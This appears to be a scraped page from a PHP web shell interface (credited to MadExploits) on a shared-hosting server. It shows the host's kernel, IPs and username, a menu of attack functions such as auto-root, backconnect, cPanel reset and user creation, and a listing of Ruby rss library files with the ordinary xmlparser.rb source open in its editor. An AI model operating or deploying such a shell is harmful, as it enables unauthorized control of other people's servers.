Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
opt /
alt /
ruby18 /
lib64 /
ruby /
1.8 /
rss /
[ HOME SHELL ]
Name
Size
Permission
Action
content
[ DIR ]
drwxr-xr-x
dublincore
[ DIR ]
drwxr-xr-x
maker
[ DIR ]
drwxr-xr-x
0.9.rb
9.48
KB
-rw-r--r--
1.0.rb
8.61
KB
-rw-r--r--
2.0.rb
2.31
KB
-rw-r--r--
atom.rb
18.88
KB
-rw-r--r--
content.rb
771
B
-rw-r--r--
converter.rb
3.71
KB
-rw-r--r--
dublincore.rb
4.23
KB
-rw-r--r--
image.rb
4.62
KB
-rw-r--r--
itunes.rb
9.96
KB
-rw-r--r--
maker.rb
954
B
-rw-r--r--
parser.rb
14.65
KB
-rw-r--r--
rexmlparser.rb
1.11
KB
-rw-r--r--
rss.rb
33.06
KB
-rw-r--r--
slash.rb
1.22
KB
-rw-r--r--
syndication.rb
1.76
KB
-rw-r--r--
taxonomy.rb
3.03
KB
-rw-r--r--
trackback.rb
6.67
KB
-rw-r--r--
utils.rb
2.62
KB
-rw-r--r--
xml-stylesheet.rb
2.14
KB
-rw-r--r--
xml.rb
1.47
KB
-rw-r--r--
xmlparser.rb
1.57
KB
-rw-r--r--
xmlscanner.rb
2.12
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xmlparser.rb
begin require "xml/parser" rescue LoadError require "xmlparser" end begin require "xml/encoding-ja" rescue LoadError require "xmlencoding-ja" if defined?(Kconv) module XMLEncoding_ja class SJISHandler include Kconv end end end end module XML class Parser unless defined?(Error) Error = ::XMLParserError end end end module RSS class REXMLLikeXMLParser < ::XML::Parser include ::XML::Encoding_ja def listener=(listener) @listener = listener end def startElement(name, attrs) @listener.tag_start(name, attrs) end def endElement(name) @listener.tag_end(name) end def character(data) @listener.text(data) end def xmlDecl(version, encoding, standalone) @listener.xmldecl(version, encoding, standalone == 1) end def processingInstruction(target, content) @listener.instruction(target, content) end end class XMLParserParser < BaseParser class << self def listener XMLParserListener end end private def _parse begin parser = REXMLLikeXMLParser.new parser.listener = @listener parser.parse(@rss) rescue ::XML::Parser::Error => e raise NotWellFormedError.new(parser.line){e.message} end end end class XMLParserListener < BaseListener include ListenerMixin def xmldecl(version, encoding, standalone) super # Encoding is converted to UTF-8 when XMLParser parses XML. @encoding = 'UTF-8' end end end
Close